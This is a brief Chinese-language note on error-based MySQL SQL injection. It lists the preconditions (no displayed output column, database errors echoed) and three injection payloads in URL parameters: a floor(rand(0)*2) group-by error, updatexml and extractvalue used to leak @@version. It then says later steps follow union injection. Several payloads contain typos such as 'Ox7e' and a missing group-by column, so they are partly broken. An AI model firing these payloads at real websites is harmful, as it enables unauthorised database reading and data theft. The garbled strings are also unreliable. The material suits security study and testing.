前提
页面没有显示位
源码使用了echo mysqlerror(输出了错误信息
注入速度快、语句复杂、不能使用group_.concat0,只能用limit依次清解
注入手法
?id=2'and (select 1 from (select count(*),concat(floor(rand(0)*2).(select (select 报错语句)from information_schema.tables limit0,1)x from
information_schema.tables group by )a )-
?id=2'and updatexml(1,concat(Ox7e,(SELECT @@version),0x7e),1)
?id=1+and extractvalue(1,concat(Ox7e,(select @@version),0x7e))
使用公式依次替换语句即可,后续步骤和union注入一样